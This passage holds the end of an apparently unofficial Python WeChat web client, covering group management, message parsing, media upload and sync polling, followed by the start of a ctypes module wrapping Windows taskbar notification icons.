do_request(package_req(user_ids)) entities = [g for r in resp if resp for g in r.get('ContactList') if g] entities = {g['UserName']: Contact(g, self, True) for g in entities} if not entities: logger.error('Aysnc request failed: raw resp: {}'.format(resp)) req_queue = [] group_queue = [] for group_id, group in entities.items(): members = list(group.members.keys()) sub_req = package_req(members, group_id) req_queue.extend(sub_req) group_queue.extend([group_id] * len(sub_req)) group.members = {} if not req_queue: return list(entities.values()) resp = do_request(req_queue, group_queue) for member, group_id in resp: group = entities[group_id] if member: for m in member['ContactList']: m = Contact(m, self) group.members[m.user_id] = m return list(entities.values()) def _process_contacts_change(self, contacts): for contact in contacts: user = contact['UserName'] if contact.get('KeyWord') == WeChatMeta.MP_FLAG: self.mp[user] = contact elif contact['UserName'].startswith(WeChatMeta.GROUP_PREFIX): if contact['MemberList']: c = Contact(contact, self) self.save_group(c) else: self.save_group(self._query_entity(user)) else: self.friends[user] = contact def get_avatar(self, user_id): params = { 'username': user_id, 'seq': int(time.time() * 4.36), # 4.36: magic number by myself 'skey': self.login_info['skey'], } if user_id.startswith(WeChatMeta.GROUP_PREFIX): path = WeChatMeta.URL['group_avatar'] else: path = WeChatMeta.URL['user_avatar'] url = self.login_info['main_uri'] + path resp = self.session.get(url, params=params) return resp.content def get_avatar_md5(self, user_id): return hashlib.md5(self.get_avatar(user_id)).hexdigest() ################## # handle message # ################## def _process_new_message(self, messages): for msg in messages: try: msg = self._reform_raw_msg(msg) if msg: self._run_callback(self.message_callback, msg) except Exception: logger.exception('Failed process raw message') def _handle_private_msg(self, msg): # TODO: implement pass def _handle_group_msg(self, from_user, to_user): group = self.get_group_by_username(to_user) if not group or from_user not in group.members: print('from', from_user, 'to', to_user, 'group', group) raise MessageDataCorruptionError user = group.members[from_user] return { 'from_user': from_user, 'from_nickname': user.display_name or user.nickname, 'to_user': to_user, 'to_nickname': group.nickname, } def _handle_initialize_msg(self, msg): users = msg['StatusNotifyUserName'].split(',') group_ids = [u for u in users if u.startswith(WeChatMeta.GROUP_PREFIX)] for group in self._query_entities(group_ids): self.save_group(group) def _handle_system_msg(self, msg, to_user): invite = WeChatMeta.RE['invite'].search(msg['Content']) if not invite: return {} group = self.get_group_by_username(to_user, force_remote=True) if not group: return {} new = { 'invitee': '', 'member_count': len(group.members), 'invitee_nickname': invite.group('invitee1') or \ invite.group('invitee2'), } for member_id, member in group.members.items(): display_name = member.display_name or member.nickname if display_name == new['invitee_nickname']: new['invitee'] = member_id break return {'new_member': new} def _reform_raw_msg(self, raw_msg): msg_type = raw_msg.get('MsgType') if msg_type == MESSAGE_TYPE.INITIALIZE: self._handle_initialize_msg(raw_msg) return try: content_type = MESSAGE_TYPE[msg_type].lower() except KeyError: content_type = 'other' new_msg = { 'is_at_me': False, 'message_type': 'private', 'content': raw_msg['Content'], 'new_member': None, 'content_type': content_type, } to_user, from_user = raw_msg['ToUserName'], raw_msg['FromUserName'] if from_user.startswith(WeChatMeta.GROUP_PREFIX): to_user, from_user = from_user, to_user if not to_user.startswith(WeChatMeta.GROUP_PREFIX): self._handle_private_msg(raw_msg) return None else: new_msg['message_type'] = 'group' if msg_type == MESSAGE_TYPE.TEXT: content = raw_msg['Content'] matched = WeChatMeta.RE['group_msg'].search(content) if matched: new_msg['content'] = matched.group('content') from_user = matched.group('username') me = self.get_group_member(to_user, self.username) or {} my_nickname = me.display_name or self.nickname if matched.group('nickname') == my_nickname: new_msg['is_at_me'] = True elif msg_type == MESSAGE_TYPE.SYSTEM: new_msg.update(self._handle_system_msg(raw_msg, to_user)) new_msg.update(self._handle_group_msg(from_user, to_user)) return new_msg ############ # Callback # ############ @classmethod def _run_callback(cls, callbacks, *args, **kwargs): if isinstance(callbacks, dict): callbacks = callbacks.values() for cb in callbacks: try: cb(*args, **kwargs) except Exception as err: logger.error('Failed run callback {}, args: {}, kwargs: ' '{}, error: {}'.format(cb, args, kwargs, err)) def save_credential(self): for cb in self.credential_update_callback: cb(self.uin, self.export_credential()) def register_credential_update_callback(self, callback, *args, **kwargs): self.credential_update_callback.append( functools.partial(callback, *args, **kwargs)) ################ # Send message # ################ def _upload_media_by_url(self, url, media_type, to_user): resp = requests.get(url) file_size = len(resp.content) file_md5 = hashlib.md5(resp.content).hexdigest() file_type = mimetypes.guess_type(url)[0] or \ 'application/octet-stream' upload_media_request = json.dumps(OrderedDict([ ('UploadType', 2), ('BaseRequest', self.login_info['base_request']), ('ClientMediaId', int(time.time() * 1e4)), ('TotalLen', file_size), ('StartPos', 0), ('DataLen', file_size), ('MediaType', 4), ('FromUserName', self.username), ('ToUserName', to_user), ('FileMd5', file_md5), ]), separators=(',', ':')) result = None params = {'f': 'json'} chunks = (file_size - 1) // self.CHUNK_SIZE + 1 last_chunk = 0 for chunk in range(1, chunks+1): last_modified = time.strftime(WeChatMeta.TIME_FORMAT) data_ticket = self.session.cookies.get( 'webwx_data_ticket', domain=WeChatMeta.COOKIE_DOMAIN ) chunk_data = resp.content[self.CHUNK_SIZE * last_chunk: self.CHUNK_SIZE * chunk] files = OrderedDict([ ('id', (None, 'WU_FILE_0')), ('name', (None, os.path.basename(url))), ('type', (None, file_type)), ('lastModifiedDate', (None, last_modified)), ('size', (None, str(file_size))), ('mediatype', (None, media_type)), ('uploadmediarequest', (None, upload_media_request)), ('webwx_data_ticket', (None, data_ticket)), ('pass_ticket', (None, self.login_info['pass_ticket'])), ('filename', (os.path.basename(url), chunk_data, file_type)) ]) last_chunk = chunk if chunks != 1: files['chunk'] = (None, str(chunk)) files['chunks'] = (None, str(chunks)) upload_url = self.login_info['upload_uri'] + \ WeChatMeta.URL['upload_media'] resp = self.session.post(upload_url, params=params, files=files) try: result = resp.json()['MediaId'] except (TypeError, ValueError): result = None return result def _send(self, to_user, msg_type, url, content=None, media_id=None): params = { 'fun': 'async', 'f': 'json', 'pass_ticket': self.login_info['pass_ticket'], } timestamp = int(time.time() * 1e4) current_user = self.username data = { 'BaseRequest': self.login_info['base_request'], 'Scene': 0, 'Msg': { 'Type': msg_type, 'Content': content, 'MediaId': media_id, 'FromUserName': current_user, 'ToUserName': to_user if to_user else current_user, 'LocalID': timestamp, 'ClientMsgId': timestamp, } } resp = self.session.post( url, params=params, data=json.dumps(data, ensure_ascii=False).encode('utf8') ) return self._decode_content(resp.content) def send_message(self, to_user, msg_type, payload=None, media_id=None): to_user = self._handle_group_id(to_user) or to_user assert payload or media_id, \ 'Requires at least one argument of payload and media_id' try: msg_type = getattr(MESSAGE_TYPE, msg_type.upper()) except KeyError: raise ValueError('Unsupported message type: {}'.format(msg_type)) if msg_type == MESSAGE_TYPE.TEXT: url = self.login_info['main_uri'] + WeChatMeta.URL['send_message'] result = self._send(to_user, msg_type, url, content=payload) return result['BaseResponse']['Ret'] == 0 if msg_type == MESSAGE_TYPE.IMAGE: media_type = 'pic' path = WeChatMeta.URL['send_image'] elif msg_type == MESSAGE_TYPE.VIDEO: media_type = 'video' path = WeChatMeta.URL['send_video'] elif msg_type == MESSAGE_TYPE.FILE: media_type = 'doc' path = WeChatMeta.URL['send_file'] else: raise ValueError('Unsupported message type: {}'.format(msg_type)) media_id = self._upload_media_by_url(payload, media_type, to_user) assert media_id, 'Failed upload file: {}'.format(payload) url = self.login_info['main_uri'] + path if msg_type == MESSAGE_TYPE.FILE: content = self._build_file_message_content(payload, media_id) media_id = None else: content = None result = self._send(to_user, msg_type, url, media_id=media_id, content=content) return result['BaseResponse']['Ret'] == 0 @staticmethod def _build_file_message_content(file_path, media_id): return WeChatMeta.FILE_MESSAGE_TEMPLATE.format( os.path.basename(file_path), str(os.path.getsize(file_path)), media_id, os.path.splitext(file_path)[1].replace('.', ''), ) ################# # Group manager # ################# def _handle_group_id(self, group_id): if group_id.startswith(WeChatMeta.GROUP_PREFIX): return group_id group = self.get_group_by_nickname(group_id) return group.user_id if group else None def del_group_member(self, group_id, member_ids): url = self.login_info['main_uri'] + WeChatMeta.URL['update_group'] params = { 'fun': 'delmember', 'pass_ticket': self.login_info['pass_ticket'], } data = { 'BaseRequest': self.login_info['base_request'], 'ChatRoomName': group_id, 'DelMemberList': ','.join(member_ids), } resp = self.session.post(url, params=params, json=data) self.save_group(self._query_entity(group_id)) return resp.json()['BaseResponse']['Ret'] == 0 def update_group_nickname(self, group_id, nickname): username = self._handle_group_id(group_id) if not username: logger.error('Failed update group nickname,' ' invalid group_id: {}'.format(group_id)) return False url = self.login_info['main_uri'] + WeChatMeta.URL['update_group'] params = { 'fun': 'modtopic', 'pass_ticket': self.login_info['pass_ticket'], } data = { 'BaseRequest': self.login_info['base_request'], 'ChatRoomName': username, 'NewTopic': nickname, } resp = self.session.post( url, params=params, data=json.dumps(data, ensure_ascii=False).encode('utf8', 'ignore'), ) self.save_group(self._query_entity(username)) return resp.json()['BaseResponse']['Ret'] == 0 def add_group_number(self, group_id, member_list): username = self._handle_group_id(group_id) if not username or username not in self.groups: logger.error('Failed delete group members,' ' invalid group_id: {}'.format(group_id)) return False url = self.login_info['main_uri'] + WeChatMeta.URL['update_group'] params = {'pass_ticket': self.login_info['pass_ticket']} data = { 'BaseRequest': self.login_info['base_request'], 'ChatRoomName': username, } members = ','.join(member_list) group = self.groups.get(username) if len(group.members) > self.invite_start_count: params['fun'] = 'invitemember' data['InviteMemberList'] = members else: params['fun'] = 'addmember' data['AddMemberList'] = members resp = self.session.post(url, params=params, json=data) self.save_group(self._query_entity(username)) return resp.json()['BaseResponse']['Ret'] == 0 def create_group(self, member_list, name=''): """ :param member_list: member username list :param name: group name :return: group info dict """ url = self.login_info['main_uri'] + WeChatMeta.URL['create_group'] params = { 'pass_ticket': self.login_info['pass_ticket'], 'r': int(time.time()), } data = { 'BaseRequest': self.login_info['base_request'], 'MemberCount': len(member_list), 'MemberList': [{'UserName': member} for member in member_list], 'Topic': name, } resp = self.session.post( url, params=params, data=json.dumps(data, ensure_ascii=False).encode('utf8', 'ignore') ) result = resp.json() if not result['BaseResponse']['Ret'] == 0: return None else: username = result['ChatRoomName'] self.send_message(username, 'text', 'Everyone welcome!') self._get_initialize_contacts() return username ################## # Listen message # ################## def listen_message(self, retries=3, thread=True): def fetch_event(): _, messages, contacts = self._fetch_server_change() self._process_new_message(messages) self._process_contacts_change(contacts) def receive_loop(_retries): fetch_event() while self._alive: self._run_callback(self.tick_hooks, self) try: check_data = self._sync_check() if check_data > 0: fetch_event() elif check_data == 0: _retries = retries elif _retries > 0: _retries -= 1 else: return self.logout() time.sleep(1) except (requests.ConnectionError, requests.Timeout, requests.HTTPError) as err: logger.error('Error in listen thread: {}'.format(err)) if self.listening: return self.listening = True if not thread: return receive_loop(retries) if self._listen_thread: raise MultiListenThreadError self.listen_thread = threading.Thread(target=receive_loop, args=(retries,)) self.listen_thread.setDaemon(True) self.listen_thread.start() def _fetch_server_change(self): url = self.login_info['main_uri'] + WeChatMeta.URL['web_sync'] params = { 'sid': self.login_info['wxsid'], 'skey': self.login_info['skey'], 'pass_ticket': self.login_info['pass_ticket'], } data = { 'BaseRequest': self.login_info['base_request'], 'SyncKey': self.login_info['sync_check_key'], 'rr': ~int(time.time()), } resp = self.session.post(url, params=params, json=data) result = self._decode_content(resp.content) self.login_info['sync_check_key'] = result['SyncCheckKey'] self.login_info['synckey'] = '|'.join([ '{}_{}'.format(item['Key'], item['Val']) for item in result['SyncCheckKey']['List'] ]) self.save_credential() success = result['BaseResponse']['Ret'] == 0 return success, result['AddMsgList'], result['ModContactList'] def _sync_check(self): url = self.login_info['web_sync_uri'] + WeChatMeta.URL['sync_check'] timestamp = int(time.time() * 1000) params = { 'r': timestamp, 'skey': self.login_info['skey'], 'sid': self.login_info['wxsid'], 'uin': self.login_info['wxuin'], 'deviceid': self.login_info['deviceid'], 'synckey': self.login_info['synckey'], '_': timestamp, } resp = self.session.get(url, params=params) matched = WeChatMeta.RE['sync_check'].search(resp.text) if not matched or matched.group('retcode') != '0': logger.debug('unexpected sync check result') return -1 else: return int(matched.group('selector')) ################### # other operation # ################### def set_pin(self, username, pin=True): url = self.login_info['main_uri'] + WeChatMeta.URL['set_pin'] params = { 'pass_ticket': self.login_info['pass_ticket'], 'lang': 'zh_CN', } data = { 'UserName': username, 'CmdId': 3, 'OP': int(pin), 'RemarkName': '', 'BaseRequest': self.login_info['base_request'], } resp = self.session.post(url, params=params, json=data) return resp.json()['BaseResponse']['Ret'] == 0 @staticmethod def _decode_content(content): return json.loads(content.decode('utf-8', 'replace')) class WeChatUnitTest(unittest.TestCase): def test_get_login_uuid(self): uuid = WeChatClient.get_login_uuid() self.assertIsInstance(uuid, str) class WeChatDemo(object): def __init__(self): self.client = WeChatClient() @staticmethod def msg_callback(msg): pprint(msg) def run(self): client = self.client client.message_callback = [self.msg_callback] client.print_cli_qrcode() client.login_by_qrcode(timeout=120) print('Nickname: {}\n' 'Username: {}\n' 'Uin: {}\n' 'alias: {}\n' 'Time: {}\n' 'Main Uri: {}\n' .format(client.nickname, client.username, client.uin, client.alias, time.ctime(), client.login_info['main_uri']) ) client.listen_message(thread=False) while True: logger.info('Waiting for event...') time.sleep(30) if __name__ == '__main__': WeChatDemo().run()
notificationicon.py
# Pure ctypes windows taskbar notification icon # via https://gist.github.com/jasonbot/5759510 import ctypes import ctypes.wintypes import os import uuid import time import gevent import threading try: from queue import Empty as queue_Empty # Python 3 except ImportError: from Queue import Empty as queue_Empty # Python 2 __all__ = ['NotificationIcon'] # Create popup menu CreatePopupMenu = ctypes.windll.user32.CreatePopupMenu CreatePopupMenu.restype = ctypes.wintypes.HMENU CreatePopupMenu.argtypes = [] MF_BYCOMMAND = 0x0 MF_BYPOSITION = 0x400 MF_BITMAP = 0x4 MF_CHECKED = 0x8 MF_DISABLED = 0x2 MF_ENABLED = 0x0 MF_GRAYED = 0x1 MF_MENUBARBREAK = 0x20 MF_MENUBREAK = 0x40 MF_OWNERDRAW = 0x100 MF_POPUP = 0x10 MF_SEPARATOR = 0x800 MF_STRING = 0x0 MF_UNCHECKED = 0x0 InsertMenu = ctypes.windll.user32.InsertMenuW InsertMenu.restype = ctypes.wintypes.BOOL InsertMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR] AppendMenu = ctypes.windll.user32.AppendMenuW AppendMenu.restype = ctypes.wintypes.BOOL AppendMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR] SetMenuDefaultItem = ctypes.windll.user32.SetMenuDefaultItem SetMenuDefaultItem.restype = ctypes.wintypes.BOOL SetMenuDefaultItem.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT] class POINT(ctypes.Structure): _fields_ = [ ('x', ctypes.wintypes.LONG), ('y', ctypes.wintypes.LONG)] GetCursorPos = ctypes.windll.user32.GetCursorPos GetCursorPos.argtypes = [ctypes.POINTER(POINT)] SetForegroundWindow = ctypes.windll.user32.SetForegroundWindow SetForegroundWindow.argtypes = [ctypes.wintypes.HWND] TPM_LEFTALIGN = 0x0 TPM_CENTERALIGN = 0x4 TPM_RIGHTALIGN = 0x8 TPM_TOPALIGN = 0x0 TPM_VCENTERALIGN = 0x10 TPM_BOTTOMALIGN = 0x20 TPM_NONOTIFY = 0x80 TPM_RETURNCMD = 0x100 TPM_LEFTBUTTON = 0x0 TPM_RIGHTBUTTON = 0x2 TPM_HORNEGANIMATION = 0x800 TPM_HORPOSANIMATION = 0x400 TPM_NOANIMATION = 0x4000 TPM_VERNEGANIMATION = 0x2000 TPM_VERPOSANIMATION = 0x1000 TrackPopupMenu = ctypes.windll.user32.TrackPopupMenu TrackPopupMenu.restype = ctypes.wintypes.BOOL TrackPopupMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_void_p] PostMessage = ctypes.windll.user32.PostMessageW PostMessage.restype = ctypes.wintypes.BOOL PostMessage.argtypes = [ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM] DestroyMenu = ctypes.windll.user32.DestroyMenu DestroyMenu.restype = ctypes.wintypes.BOOL DestroyMenu.argtypes = [ctypes.wintypes.HMENU] # Create notification icon GUID = ctypes.c_ubyte * 16 class TimeoutVersionUnion(ctypes.Union): _fields_ = [('uTimeout', ctypes.wintypes.UINT), ('uVersion', ctypes.wintypes.UINT),] NIS_HIDDEN = 0x1 NIS_SHAREDICON = 0x2 class NOTIFYICONDATA(ctypes.Structure): def __init__(self, *args, **kwargs): super(NOTIFYICONDATA, self).__init__(*args, **kwargs) self.cbSize = ctypes.sizeof(self) _fields_ = [ ('cbSize', ctypes.wintypes.DWORD), ('hWnd', ctypes.wintypes.HWND), ('uID', ctypes.wintypes.UINT), ('uFlags', ctypes.wintypes.UINT), ('uCallbackMessage', ctypes.wintypes.UINT), ('hIcon', ctypes.wintypes.HICON), ('szTip', ctypes.wintypes.WCHAR * 64), ('dwState', ctypes.wintypes.DWORD), ('dwStateMask', ctypes.wintypes.DWORD), ('szInfo', ctypes.wintypes.WCHAR * 256), ('union', TimeoutVersionUnion), ('szInfoTitle', ctypes.wintypes.WCHAR * 64), ('dwInfoFlags', ctypes.wintypes.DWORD), ('guidItem', GUID), ('hBalloonIcon', ctypes.wintypes.HICON), ] NIM_ADD = 0 NIM_MODIFY = 1 NIM_DELETE = 2 NIM_SETFOCUS = 3 NIM_SETVERSION = 4 NIF_MESSAGE = 1 NIF_ICON = 2 NIF_TIP = 4 NIF_STATE = 8 NIF_INFO = 16 NIF_GUID = 32 NIF_REALTIME = 64 NIF_SHOWTIP = 128 NIIF_NONE = 0 NIIF_INFO = 1 NIIF_WARNING = 2 NIIF_ERROR = 3 NIIF_USER = 4 NOTIFYICON_VERSION = 3 NOTIFYICON_VERSION_4 = 4 Shell_NotifyIcon = ctypes.windll.shell32.Shell_NotifyIconW Shell_NotifyIcon.restype = ctypes.wintypes.BOOL Shell_NotifyIcon.argtypes = [ctypes.wintypes.DWORD, ctypes.POINTER(NOTIFYICONDATA)] # Load icon/image IMAGE_BITMAP = 0 IMAGE_ICON = 1 IMAGE_CURSOR = 2 LR_CREATEDIBSECTION = 0x00002000 LR_DEFAULTCOLOR = 0x00000000 LR_DEFAULTSIZE = 0x00000040 LR_LOADFROMFILE = 0x00000010 LR_LOADMAP3DCOLORS = 0x00001000 LR_LOADTRANSPARENT = 0x00000020 LR_MONOCHROME = 0x00000001 LR_SHARED = 0x00008000 LR_VGACOLOR = 0x00000080 OIC_SAMPLE = 32512 OIC_HAND = 32513 OIC_QUES = 32514 OIC_BANG = 32515 OIC_NOTE = 32516 OIC_WINLOGO = 32517 OIC_WARNING = OIC_BANG OIC_ERROR = OIC_HAND OIC_INFORMATION = OIC_NOTE LoadImage = ctypes.windll.user32.LoadImageW LoadImage.restype = ctypes.wintypes.HANDLE LoadImage.argtypes = [ctypes.wintypes.HINSTANCE, ctypes.wintypes.LPCWSTR, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.wintypes.UINT] # CreateWindow call WNDPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM) DefWindowProc = ctypes.windll.user32.DefWindowProcW DefWindowProc.restype = ctypes.c_int DefWindowProc.argtypes = [ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM] WS_OVERLAPPED = 0x00000000L WS_POPUP = 0x80000000L WS_CHILD = 0x40000000L WS_MINIMIZE = 0x20000000L WS_VISIBLE = 0x10000000L WS_DISABLED = 0x08000000L WS_CLIPSIBLINGS = 0x04000000L WS_CLIPCHILDREN = 0x02000000L WS_MAXIMIZE = 0x01000000L WS_CAPTION = 0x00C00000L WS_BORDER = 0x00800000L WS_DLGFRAME = 0x00400000L WS_VSCROLL = 0x00200000L WS_HSCROLL = 0x00100000L WS_SYSMENU = 0x00080000L WS_THICKFRAME = 0x00040000L WS_GROUP = 0x00020000L WS_TABSTOP = 0x00010000L WS_MINIMIZEBOX = 0x00020000L WS_MAXIMIZEBOX = 0x00010000L WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME | WS_MINIMIZEBOX | WS_MAXIMIZEBOX) SM_XVIRTUALSCREEN = 76 SM_YVIRTUALSCREEN = 77 SM_CXVIRTUALSCREEN = 78 SM_CYVIRTUALSCREEN = 79 SM_CMONITORS = 80 SM_SAMEDISPLAYFORMAT = 81 WM_NULL = 0x0000 WM_CREATE = 0x0001 WM_DESTROY = 0x0002 WM_MOVE = 0x0003 WM_SIZE = 0x0005 WM_ACTIVATE = 0x0006 WM_SETFOCUS = 0x0007 WM_KILLFOCUS = 0x0008 WM_ENABLE = 0x000A WM_SETREDRAW = 0x000B WM_SETTEXT = 0x000C WM_GETTEXT = 0x000D WM_GETTEXTLENGTH = 0x000E WM_PAINT = 0x000F WM_CLOSE = 0x0010 WM_QUERYENDSESSION = 0x0011 WM_QUIT = 0x0012 WM_QUERYOPEN = 0x0013 WM_ERASEBKGND = 0x0014 WM_SYSCOLORCHANGE = 0x0015 WM_ENDSESSION = 0x0016 WM_SHOWWINDOW = 0x0018 WM_CTLCOLOR = 0x0019 WM_WININICHANGE = 0x001A WM_SETTINGCHANGE = 0x001A WM_DEVMODECHANGE = 0x001B WM_ACTIVATEAPP = 0x001C WM_FONTCHANGE = 0x001D WM_TIMECHANGE = 0x001E WM_CANCELMODE = 0x001F WM_SETCURSOR = 0x0020 WM_MOUSEACTIVATE = 0x0021 WM_CHILDACTIVATE = 0x0022 WM_QUEUESYNC = 0x0023 WM_GETMINMAXINFO = 0x0024 WM_PAINTICON = 0x0026 WM_ICONERASEBKGND = 0x0027 WM_NEXTDLGCTL = 0x0028 WM_SPOOLERSTATUS = 0x002A WM_DRAWITEM = 0x002B WM_MEASUREITEM = 0x002C WM_DELETEITEM = 0x002D WM_VKEYTOITEM = 0x002E WM_CHARTOITEM = 0x002F WM_SETFONT = 0x0030 WM_GETFONT = 0x0031 WM_SETHOTKEY = 0x0032 WM_GETHOTKEY = 0x0033 WM_QUERYDRAGICON = 0x0037 WM_COMPAREITEM = 0x0039 WM_GETOBJECT = 0x003D WM_COMPACTING = 0x0041 WM_COMMNOTIFY = 0x0044 WM_WINDOWPOSCHANGING = 0x0046 WM_WINDOWPOSCHANGED = 0x0047 WM_POWER = 0x0048 WM_COPYDATA = 0x004A WM_CANCELJOURNAL = 0x004B WM_NOTIFY = 0x004E WM_INPUTLANGCHANGEREQUEST = 0x0050 WM_INPUTLANGCHANGE = 0x0051 WM_TCARD = 0x0052 WM_HELP = 0x0053 WM_USERCHANGED = 0x0054 WM_NOTIFYFORMAT = 0x0055 WM_CONTEXTMENU = 0x007B WM_STYLECHANGING = 0x007C WM_STYLECHANGED = 0x007D WM_DISPLAYCHANGE = 0x007E WM_GETICON = 0x007F WM_SETICON = 0x0080 WM_NCCREATE = 0x0081 WM_NCDESTROY = 0x0082 WM_NCCALCSIZE = 0x0083 WM_NCHITTEST = 0x0084 WM_NCPAINT = 0x0085 WM_NCACTIVATE = 0x0086 WM_GETDLGCODE = 0x0087 WM_SYNCPAINT = 0x0088 WM_NCMOUSEMOVE = 0x00A0 WM_NCLBUTTONDOWN = 0x00A1 WM_NCLBUTTONUP = 0x00A2 WM_NCLBUTTONDBLCLK = 0x00A3 WM_NCRBUTTONDOWN = 0x00A4 WM_NCRBUTTONUP = 0x00A5 WM_NCRBUTTONDBLCLK = 0x00A6 WM_NCMBUTTONDOWN = 0x00A7 WM_NCMBUTTONUP = 0x00A8 WM_NCMBUTTONDBLCLK = 0x00A9 WM_KEYDOWN = 0x0100 WM_KEYUP = 0x0101 WM_CHAR = 0x0102 WM_DEADCHAR = 0x0103 WM_SYSKEYDOWN = 0x0104 WM_SYSKEYUP = 0x0105 WM_SYSCHAR = 0x0106 WM_SYSDEADCHAR = 0x0107 WM_KEYLAST = 0x0108 WM_IME_STARTCOMPOSITION = 0x010D WM_IME_ENDCOMPOSITION = 0x010E WM_IME_COMPOSITION = 0x010F WM_IME_KEYLAST = 0x010F WM_INITDIALOG = 0x0110 WM_COMMAND = 0x0111 WM_SYSCOMMAND = 0x0112 WM_TIMER = 0x0113 WM_HSCROLL = 0x0114 WM_VSCROLL = 0x0115 WM_INITMENU = 0x0116 WM_INITMENUPOPUP = 0x0117 WM_MENUSELECT = 0x011F WM_MENUCHAR = 0x0120 WM_ENTERIDLE = 0x0121 WM_MENURBUTTONUP = 0x0122 WM_MENUDRAG = 0x0123 WM_MENUGETOBJECT = 0x0124 WM_UNINITMENUPOPUP = 0x0125 WM_MENUCOMMAND = 0x0126 WM_CTLCOLORMSGBOX = 0x0132 WM_CTLCOLOREDIT = 0x0133 WM_CTLCOLORLISTBOX = 0x0134 WM_CTLCOLORBTN = 0x0135 WM_CTLCOLORDLG = 0x0136 WM_CTLCOLORSCROLLBAR = 0x0137 WM_CTLCOLORSTATIC = 0x0138 WM_MOUSEMOVE = 0x0200 WM_LBUTTONDOWN = 0x0201 WM_LBUTTONUP = 0x0202 WM_LBUTTONDBLCLK = 0x0203 WM_RBUTTONDOWN = 0x0204 WM_RBUTTONUP = 0x0205 WM_RBUTTONDBLCLK = 0x0206 WM_MBUTTONDOWN = 0x0207 WM_MBUTTONUP = 0x0208 WM_MBUTTONDBLCLK = 0x0209 WM_MOUSEWHEEL = 0x020A WM_PARENTNOTIFY = 0x0210 WM_ENTERMENULOOP = 0x0211 WM_EXITMENULOOP = 0x0212 WM_NEXTMENU = 0x0213 WM_SIZING = 0x0214 WM_CAPTURECHANGED = 0x0215 WM_MOVING = 0x0216 WM_DEVICECHANGE = 0x0219 WM_MDICREATE = 0x0220 WM_MDIDESTROY = 0x0221 WM_MDIACTIVATE = 0x0222 WM_MDIRESTORE = 0x0223 WM_MDINEXT = 0x0224 WM_MDIMAXIMIZE = 0x0225 WM_MDITILE = 0x0226 WM_MDICASCADE = 0x0227 WM_MDIICONARRANGE = 0x0228 WM_MDIGETACTIVE = 0x0229 WM_MDISETMENU = 0x0230 WM_ENTERSIZEMOVE = 0x0231 WM_EXITSIZEMOVE = 0x0232 WM_DROPFILES = 0x0233 WM_MDIREFRESHMENU = 0x0234 WM_IME_SETCONTEXT = 0x0281 WM_IME_NOTIFY = 0x0282 WM_IME_CONTROL = 0x0283 WM_IME_COMPOSITIONFULL = 0x0284 WM_IME_SELECT = 0x0285 WM_IME_CHAR = 0x0286 WM_IME_REQUEST = 0x0288 WM_IME_KEYDOWN = 0x0290 WM_IME_KEYUP = 0x0291 WM_MOUSEHOVER = 0x02A1 WM_MOUSELEAVE = 0x02A3 WM_CUT = 0x0300 WM_COPY = 0x0301 WM_PASTE = 0x0302 WM_CLEAR = 0x0303 WM_UNDO = 0x0304 WM_RENDERFORMAT = 0x0305 WM_RENDERALLFORMATS = 0x0306 WM_DESTROYCLIPBOARD = 0x0307 WM_DRAWCLIPBOARD = 0x0308 WM_PAINTCLIPBOARD = 0x0309 WM_VSCROLLCLIPBOARD = 0x030A WM_SIZECLIPBOARD = 0x030B WM_ASKCBFORMATNAME = 0x030C WM_CHANGECBCHAIN = 0x030D WM_HSCROLLCLIPBOARD = 0x030E WM_QUERYNEWPALETTE = 0x030F WM_PALETTEISCHANGING = 0x0310 WM_PALETTECHANGED = 0x0311 WM_HOTKEY = 0x0312 WM_PRINT = 0x0317 WM_PRINTCLIENT = 0x0318 WM_HANDHELDFIRST = 0x0358 WM_HANDHELDLAST = 0x035F WM_AFXFIRST = 0x0360 WM_AFXLAST = 0x037F WM_PENWINFIRST = 0x0380 WM_PENWINLAST = 0x038F WM_APP = 0x8000 WM_USER = 0x0400 WM_REFLECT = WM_USER + 0x1c00 class WNDCLASSEX(ctypes.Structure): def __init__(self, *args, **kwargs): super(WNDCLASSEX, self).__init__(*args, **kwargs) self.cbSize = ctypes.sizeof(self) _fields_ = [("cbSize", ctypes.c_uint), ("style", ctypes.c_uint), ("lpfnWndProc", WNDPROC), ("cbClsExtra", ctypes.c_int), ("cbWndExtra", ctypes.c_int), ("hInstance", ctypes.wintypes.HANDLE), ("hIcon", ctypes.wintypes.HANDLE), ("hCursor", ctypes.wintypes.HANDLE), ("hBrush", ctypes.wintypes.HANDLE), ("lpszMenuName", ctypes.wintypes.LPCWSTR), ("lpszClassName", ctypes.wintypes.LPCWSTR), ("hIconSm", ctypes.wintypes.HANDLE)] ShowWindow = ctypes.windll.user32.ShowWindow ShowWindow.argtypes = [ctypes.wintypes.HWND, ctypes.c_int] def GenerateDummyWindow(callback, uid): newclass = WNDCLASSEX() newclass.lpfnWndProc = callback newclass.lpszClassName = uid.replace("-", "") ATOM = ctypes.windll.user32.RegisterClassExW(ctypes.byref(newclass)) hwnd = ctypes.windll.user32.CreateWindowExW(0, newclass.lpszClassName, None, WS_POPUP, 0, 0, 0, 0, 0, 0, 0, 0) return hwnd # Message loop calls TIMERCALLBACK = ctypes.WINFUNCTYPE(None, ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.POINTER(ctypes.wintypes.UINT), ctypes.wintypes.DWORD) SetTimer = ctypes.windll.user32.SetTimer SetTimer.restype = ctypes.POINTER(ctypes.wintypes.UINT) SetTimer.argtypes = [ctypes.wintypes.HWND, ctypes.POINTER(ctypes.wintypes.UINT), ctypes.wintypes.UINT, TIMERCALLBACK] KillTimer = ctypes.windll.user32.KillTimer KillTimer.restype = ctypes.wintypes.BOOL KillTimer.argtypes = 